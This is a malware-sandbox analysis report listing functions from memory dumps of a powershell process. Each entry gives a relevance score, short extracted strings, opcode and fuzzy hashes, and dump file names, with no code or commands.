                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$x.hk$-hk
                                                                                                • API String ID: 0-4195761117
                                                                                                • Opcode ID: df79988a0d919b7a7e2ec6ca5769f43ad6ca955cc62d9da61eb8f9f231bf4f74
                                                                                                • Instruction ID: a41cef2880dcc9feb231e41a83628a3034a1276a2483d4abc06ac19d92f16850
                                                                                                • Opcode Fuzzy Hash: df79988a0d919b7a7e2ec6ca5769f43ad6ca955cc62d9da61eb8f9f231bf4f74
                                                                                                • Instruction Fuzzy Hash: 944262B4A00215DFD724DB58C951FAABBB2EB89314F10C099DA099F391CB72ED85CB91
                                                                                                Function 07BCC507 Relevance: 5.4, Strings: 4, Instructions: 425COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (fwl$4'^q$4tl$x.hk
                                                                                                • API String ID: 0-1449149415
                                                                                                • Opcode ID: 5bb08181db9a918ba249fd7c676d4d13a52fc8f3b5d49d3e31d45c75c07070c3
                                                                                                • Instruction ID: 179c66321fe05724cd32f9a407205a2477a435f29ceb59c8df4f7383636b3327
                                                                                                • Opcode Fuzzy Hash: 5bb08181db9a918ba249fd7c676d4d13a52fc8f3b5d49d3e31d45c75c07070c3
                                                                                                • Instruction Fuzzy Hash: 54124FF4A00219DFEB24CB14C951BAABBB2EB55314F50C0D9D50DAB351CB72AD85CFA1
                                                                                                Function 07BCC4F1 Relevance: 5.3, Strings: 4, Instructions: 331COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (fwl$4'^q$4tl$x.hk
                                                                                                • API String ID: 0-1449149415
                                                                                                • Opcode ID: 98686cbb313b78486c2a765dc35df6ffbaa85394d3580284a71b7b004c16f24f
                                                                                                • Instruction ID: cb6e19a1e21b12085ad0e68c079662707b8ee51b9cc47876ef5752727f6f804e
                                                                                                • Opcode Fuzzy Hash: 98686cbb313b78486c2a765dc35df6ffbaa85394d3580284a71b7b004c16f24f
                                                                                                • Instruction Fuzzy Hash: 0CE14AF0A00219CFEB24CB14C955BAABBB2EB55314F50C1D9D50DAB381CB72AD85CFA1
                                                                                                Function 07BC6F08 Relevance: 4.4, Strings: 3, Instructions: 647COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$x.hk$-hk
                                                                                                • API String ID: 0-3546449468
                                                                                                • Opcode ID: 797163933722f7f1032867e037f37ef49b3d9411fbc9bee910f0cc5db11d63ff
                                                                                                • Instruction ID: bfcbac2d78470ac6fca2254ac86f14c2e95d6cc07a32e4d28bbc65fc798fceb8
                                                                                                • Opcode Fuzzy Hash: 797163933722f7f1032867e037f37ef49b3d9411fbc9bee910f0cc5db11d63ff
                                                                                                • Instruction Fuzzy Hash: 82524FB4A00215DFD724DB18C951FAABBB2EB89314F50C0D9DA099F391CA72AD85CF91
                                                                                                Function 07BCC381 Relevance: 4.4, Strings: 3, Instructions: 620COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$x.hk$-hk
                                                                                                • API String ID: 0-3546449468
                                                                                                • Opcode ID: 15b4ccad2a7125cf1e95e08037ae20858adf1aa7a399faf40b1d699a32592d80
                                                                                                • Instruction ID: 55a624922874bc8e089daae46e8e3a099996be59b31d19dc0cc00f687a96e84b
                                                                                                • Opcode Fuzzy Hash: 15b4ccad2a7125cf1e95e08037ae20858adf1aa7a399faf40b1d699a32592d80
                                                                                                • Instruction Fuzzy Hash: 50426EB0B002149FD724DF58C951BEABBB2EB99315F50C099DA099F381CB72ED818F91
                                                                                                Function 07BC7019 Relevance: 4.2, Strings: 3, Instructions: 485COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$x.hk$-hk
                                                                                                • API String ID: 0-3546449468
                                                                                                • Opcode ID: 39df2029e04cc67842a9533f46f6634904d2f32a79633a303d1e73dcbd7a51d3
                                                                                                • Instruction ID: b98398952d1da27825d25736c2b1e1252400cda71580b13932a2f870e0007ded
                                                                                                • Opcode Fuzzy Hash: 39df2029e04cc67842a9533f46f6634904d2f32a79633a303d1e73dcbd7a51d3
                                                                                                • Instruction Fuzzy Hash: 64224FB4A00215DFD724DB18C951FAABBB2EB89314F50C099DA099F391CB72ED85CF91
                                                                                                Function 07BCC467 Relevance: 4.2, Strings: 3, Instructions: 467COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$x.hk$-hk
                                                                                                • API String ID: 0-3546449468
                                                                                                • Opcode ID: c9a62ef79a7d956450a321630f03ff0bef2786eabe95600ccd11feda12f815c1
                                                                                                • Instruction ID: 7ccfccb52a99f95d16da359e0f58d633a73abc63a6198363d4c37c46ff4c8313
                                                                                                • Opcode Fuzzy Hash: c9a62ef79a7d956450a321630f03ff0bef2786eabe95600ccd11feda12f815c1
                                                                                                • Instruction Fuzzy Hash: 311261B4B002149FD724DF58C951BEABBB2EB89315F50C099DA099F381CB72ED858F91
                                                                                                Function 07BC3E00 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $^q$$^q$$^q
                                                                                                • API String ID: 0-831282457
                                                                                                • Opcode ID: a262cb5ecc04eedf80251c199db338af8538b7927cd872319f71c298fa177fc5
                                                                                                • Instruction ID: a71b12c5221c9bdc87ff1c73035bec9b9d4b9a8a470490933ca1356a4e780c0c
                                                                                                • Opcode Fuzzy Hash: a262cb5ecc04eedf80251c199db338af8538b7927cd872319f71c298fa177fc5
                                                                                                • Instruction Fuzzy Hash: 824139F2B002169BDF24DB69D84026AB7E5EF84611B54C8AEC819DB340DA32D90487E2
                                                                                                Function 07BC7910 Relevance: 3.0, Strings: 2, Instructions: 544COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (fwl$(fwl
                                                                                                • API String ID: 0-2797258600
                                                                                                • Opcode ID: 384eb3f1d784782bb7c88dc7006ecf0e8295d18a444b53c8461ee629f1b7fad9
                                                                                                • Instruction ID: 10d0d9cf6c201f381097a9604a7666cf1638d5d49370f0304a83f01d8bbdb147
                                                                                                • Opcode Fuzzy Hash: 384eb3f1d784782bb7c88dc7006ecf0e8295d18a444b53c8461ee629f1b7fad9
                                                                                                • Instruction Fuzzy Hash: D3223BB4B00215DFEB14CF58C551EAABBF2EB88315F25C0A9EA059B351CB72ED41CB91
                                                                                                Function 07BC2070 Relevance: 2.8, Strings: 2, Instructions: 323COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q
                                                                                                • API String ID: 0-2697143702
                                                                                                • Opcode ID: 685765d1a6523d5c6ac4f3bdf97f692f984ab3cd5d33eab10d3db9f615931b76
                                                                                                • Instruction ID: bca9ee34d89777738a597230e6c4d94ac5835a29e4e2df2c57faeb6c3d472f8a
                                                                                                • Opcode Fuzzy Hash: 685765d1a6523d5c6ac4f3bdf97f692f984ab3cd5d33eab10d3db9f615931b76
                                                                                                • Instruction Fuzzy Hash: 80A1D8F1B002168FEB25DA6889126AABBA2EFC5311F14C4EED905CF651DB31DD41C7A2
                                                                                                Function 07BC3DE3 Relevance: 2.6, Strings: 2, Instructions: 76COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $^q$$^q
                                                                                                • API String ID: 0-355816377
                                                                                                • Opcode ID: ea211c7168cdb4a749c8623554a981fdaaf734d7086f7bd2f82c5d1a15364192
                                                                                                • Instruction ID: d0fad29d7d06003837d122f130240d9f72b7f2e3671f533aa67464b65bf7d5ab
                                                                                                • Opcode Fuzzy Hash: ea211c7168cdb4a749c8623554a981fdaaf734d7086f7bd2f82c5d1a15364192
                                                                                                • Instruction Fuzzy Hash: 172136F6D002579BDB21CF69C84016ABBF4EF46610B98C5DEC858EB241E7309844C7E3
                                                                                                Function 07BC7758 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: x.hk
                                                                                                • API String ID: 0-3394790906
                                                                                                • Opcode ID: d8bfe76c3d841c9e18d0383d95e0f4b7969826ad437252b5bbb3fa16e4f8d971
                                                                                                • Instruction ID: a7d3c3068e9943b817dc5ef6dd8030f376d55c56428a82b581853220fda81a6b
                                                                                                • Opcode Fuzzy Hash: d8bfe76c3d841c9e18d0383d95e0f4b7969826ad437252b5bbb3fa16e4f8d971
                                                                                                • Instruction Fuzzy Hash: 5031E5B4B40204AFD714DB68C915BEE7AE3AB84310F50C068EB056F3C1CF75AC468BA1
                                                                                                Function 07BCF990 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q
                                                                                                • API String ID: 0-1614139903
                                                                                                • Opcode ID: 2d0bfe62e3dddf3388cae4c1b0cb8c85bf2b8bbd663ac9a9b394c152d0f71647
                                                                                                • Instruction ID: 732347e18508ee0dd17ff7d7f2ac8af6e1e72d499837849e265b3899a1aa9fcd
                                                                                                • Opcode Fuzzy Hash: 2d0bfe62e3dddf3388cae4c1b0cb8c85bf2b8bbd663ac9a9b394c152d0f71647
                                                                                                • Instruction Fuzzy Hash: D921B4F3B00206AFEF24CA248541779BAA3DB85640F58C0EDE900EB285EB75D94587A1
                                                                                                Function 07BC78ED Relevance: .4, Instructions: 419COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cc046e2297c0c79c21b6333a0c3ef7ee788b4ea7de7b4861aacb0d5d7d1231f2
                                                                                                • Instruction ID: c1fba3e9404dba1fabe872ebbc275d90d01025babfb9e4e07ec3152f183b6982
                                                                                                • Opcode Fuzzy Hash: cc046e2297c0c79c21b6333a0c3ef7ee788b4ea7de7b4861aacb0d5d7d1231f2
                                                                                                • Instruction Fuzzy Hash: 44025BB4A00215EFDB14CF98C451EAABBB2EF84314F25C099EA059F391CB72ED45CB91
                                                                                                Function 07BC4600 Relevance: .3, Instructions: 327COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3c754e14b6a0af099a9c3b7d0836cf2bf85b4e42268b178075fc520bb5d511bf
                                                                                                • Instruction ID: ebc6eccdcfc3afbda5a8d05ef1ebdc4e40cac1532ff864962b1dcfcbae9fc7b0
                                                                                                • Opcode Fuzzy Hash: 3c754e14b6a0af099a9c3b7d0836cf2bf85b4e42268b178075fc520bb5d511bf
                                                                                                • Instruction Fuzzy Hash: 73D19FB0B002449FDB14CB98C551FA9BBB2EF89315F15C0A9EA099F391CB72ED45CB91
                                                                                                Function 050472A0 Relevance: .3, Instructions: 313COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ca5bf05c28bfc6ed5214d44d7ca0089d66ef87560ee93e770b3bfe6fa3eb1714
                                                                                                • Instruction ID: f03c6e29f7e6b50a926ccf026db794f4bc2570ae2e2d44e3584be87454c170ef
                                                                                                • Opcode Fuzzy Hash: ca5bf05c28bfc6ed5214d44d7ca0089d66ef87560ee93e770b3bfe6fa3eb1714
                                                                                                • Instruction Fuzzy Hash: 7AC18C75A002489FCB14DFA5E544AADBBF2FF84310F118569E406AF365DB74AD8ACF80
                                                                                                Function 0504A980 Relevance: .3, Instructions: 306COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2c4ca64468e436cf46f914a63e7e84bdca58d8efdd66d98ea51082cc985be016
                                                                                                • Instruction ID: 659f0394f816abe11d054b53c939551e86748555f453c86948b4fc9aeb45c2c8
                                                                                                • Opcode Fuzzy Hash: 2c4ca64468e436cf46f914a63e7e84bdca58d8efdd66d98ea51082cc985be016
                                                                                                • Instruction Fuzzy Hash: 20D105B4A052489FCB55CFA8D584A9EBBF2BF48310F248569E805AB361C735ED81CF90
                                                                                                Function 07BC8648 Relevance: .2, Instructions: 237COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a0992b7fea74f147e92e221c29ef428e726391b3857dcfa3573ad362def85f26
                                                                                                • Instruction ID: 15790ececa4b376878471f4825ae49a69de6b198469facb7ca18626a871a0d25
                                                                                                • Opcode Fuzzy Hash: a0992b7fea74f147e92e221c29ef428e726391b3857dcfa3573ad362def85f26
                                                                                                • Instruction Fuzzy Hash: E67135F5B00216DFDB20DA7989052BABBE2EF85311F14C4BED905DB680EB31D985C7A1
                                                                                                Function 05047A68 Relevance: .2, Instructions: 190COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a2cf6e9c2e26e48464fe0852218e79382ee875025d88f5dcad763660000d04b0
                                                                                                • Instruction ID: f1691c7c9d86789af19dff0a5c0be8eddb769347c992656bc9a588a53ce94a16
                                                                                                • Opcode Fuzzy Hash: a2cf6e9c2e26e48464fe0852218e79382ee875025d88f5dcad763660000d04b0
                                                                                                • Instruction Fuzzy Hash: C371AC70A002088FCB14DF69E884AAEBBF2FF89314F14C979D4159B751DB71AC46CB90
                                                                                                Function 05047BD6 Relevance: .2, Instructions: 188COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9d7176d66aabbe06998b1f574275678b60c29a1a94f7cd376b4643ffef73a4fc
                                                                                                • Instruction ID: 8eb6ed802fcb62c3c6346823f3e0534ed87288f0326cc80f077c6b258515c02d
                                                                                                • Opcode Fuzzy Hash: 9d7176d66aabbe06998b1f574275678b60c29a1a94f7cd376b4643ffef73a4fc
                                                                                                • Instruction Fuzzy Hash: 91715970A006089FDB18DFA4E484BADBBF2FF88304F148529D416AB354DB74AD4ACF91
                                                                                                Function 0504D627 Relevance: .2, Instructions: 163COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fd617fb47cd0565ba69e0d16e7960f961ec3925463fe5d776a106df065dae1a5
                                                                                                • Instruction ID: b5d6ec54fdca750c2c6cf217555cb6b25e59a0fc785d6eed885227090dac8d55
                                                                                                • Opcode Fuzzy Hash: fd617fb47cd0565ba69e0d16e7960f961ec3925463fe5d776a106df065dae1a5
                                                                                                • Instruction Fuzzy Hash: B951B335A103548FCB05DB38C4546AEBBF2AF89310F19C46AC545DF396CF749C468BA1
                                                                                                Function 07BC2053 Relevance: .1, Instructions: 133COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2df83d9b358e7242c3ec3d3c61517c31117d9c190c6d529f396c4f869bf793b8
                                                                                                • Instruction ID: 6d9de73febf42b4ff0701dcf91587623367e5c0b4bed7da50d23aebcf97d8ba6
                                                                                                • Opcode Fuzzy Hash: 2df83d9b358e7242c3ec3d3c61517c31117d9c190c6d529f396c4f869bf793b8
                                                                                                • Instruction Fuzzy Hash: D141E7F1B042028FEB25CB68C9026E67BA2FF95650F14C4EEDA04DF261D735D945CBA2
                                                                                                Function 050477F9 Relevance: .1, Instructions: 120COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2499942e61bc028c9e711515bbce99b417839304e3085e03f891446576647b51
                                                                                                • Instruction ID: 87f8af5574f9f83dba9b92d5c4059e21d17eae8a6e202679661246f1843db1dd
                                                                                                • Opcode Fuzzy Hash: 2499942e61bc028c9e711515bbce99b417839304e3085e03f891446576647b51
                                                                                                • Instruction Fuzzy Hash: D6419C71A002408FDB15DB74E858AAE7BF6EF89750F048478E406EB7A1CB34AC42CB90
                                                                                                Function 0504D680 Relevance: .1, Instructions: 119COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3bf4eb9e699c044ff78482d970242723d3a704685ffcac0ce9b3700543fa58b8
                                                                                                • Instruction ID: 56f2c0f7069118010752fd0dbb441a0127040071b5a40d5536f57d2e887ca2b2
                                                                                                • Opcode Fuzzy Hash: 3bf4eb9e699c044ff78482d970242723d3a704685ffcac0ce9b3700543fa58b8
                                                                                                • Instruction Fuzzy Hash: 50415F75A102048FDB08DF79D4947AEBAF7EF88311F14C469D909AB395CF759C828BA0
                                                                                                Function 05047A53 Relevance: .1, Instructions: 118COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2e2186d17ca2ab001b3465711ba334f50a2386364d247fd614adbd44875ae168
                                                                                                • Instruction ID: ce99d6354138979b24f6ba5a8c9faaa578ed97000e1012ae7ca1d14491a406b1
                                                                                                • Opcode Fuzzy Hash: 2e2186d17ca2ab001b3465711ba334f50a2386364d247fd614adbd44875ae168
                                                                                                • Instruction Fuzzy Hash: EF417BB0A002188FDB18DFA5E844BADBBF2FF89310F148539D005AB795DB74AC46CB80
                                                                                                Function 05042BB0 Relevance: .1, Instructions: 107COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5d784d7be1b7d547559034c40ba75e7e5bf81119fb2645b24a33727ff876ba59
                                                                                                • Instruction ID: fe19068a1d71b00bceb23374c8c972d7799a17b75249b46ea8ab017798c16b6c
                                                                                                • Opcode Fuzzy Hash: 5d784d7be1b7d547559034c40ba75e7e5bf81119fb2645b24a33727ff876ba59
                                                                                                • Instruction Fuzzy Hash: 364115B8A005069FCB09CF58D4949AEBBB1FF48314F1581A9D816AB265C336FC50CFA4
                                                                                                Function 0504A930 Relevance: .1, Instructions: 86COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 544e956b5be0df66d1845439fca71d6d76a32fb328fdedd723f28d420d48039b
                                                                                                • Instruction ID: 5f5aea62d4fc1cd8bc5d56dbfa5df3522f97c5d7bad25f1503f0694892b25012
                                                                                                • Opcode Fuzzy Hash: 544e956b5be0df66d1845439fca71d6d76a32fb328fdedd723f28d420d48039b
                                                                                                • Instruction Fuzzy Hash: 4A3182B5A093898FCB02CFA8D8509ADBFB1FF4A210B194196D454DB392D635EC45CBA1
                                                                                                Function 07BC862B Relevance: .1, Instructions: 80COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e85cc0f8debbad324a20953e918eb069f3f497f4f6b2f47b7e33cb0923196980
                                                                                                • Instruction ID: 5e58902317090cb0e4fa68db0299437ab26c350848f29ee15b417904d576f3ee
                                                                                                • Opcode Fuzzy Hash: e85cc0f8debbad324a20953e918eb069f3f497f4f6b2f47b7e33cb0923196980
                                                                                                • Instruction Fuzzy Hash: 1B21E5F5604202DFDF21DE2895127B9BFA1DF80350F5881BAD604CB291EB359980CBB1
                                                                                                Function 0504A93B Relevance: .1, Instructions: 77COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b7376bfa4ca5df9ee1670f4528cd4d2c53d501125310405b1579bc28ab038967
                                                                                                • Instruction ID: 0a42c438b2f32fd701395dd3378df406b9ac8bac0d33f14e4943bad44e8e34e7
                                                                                                • Opcode Fuzzy Hash: b7376bfa4ca5df9ee1670f4528cd4d2c53d501125310405b1579bc28ab038967
                                                                                                • Instruction Fuzzy Hash: C12185B4A093899FCB01CFA8D8509ADBFB1FF4A310B15419AD445DB352C334EC45CBA1
                                                                                                Function 032CF520 Relevance: .1, Instructions: 76COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1985501836.00000000032CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_32cd000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: faff808829ac15d8b734c23721f648a9e78d43ec092fb70aedb6cb99961ff9ed
                                                                                                • Instruction ID: 165da4b4102fb15dd61437b7fb4d36a872b97c09cca873809105a8bb9072e69d
                                                                                                • Opcode Fuzzy Hash: faff808829ac15d8b734c23721f648a9e78d43ec092fb70aedb6cb99961ff9ed
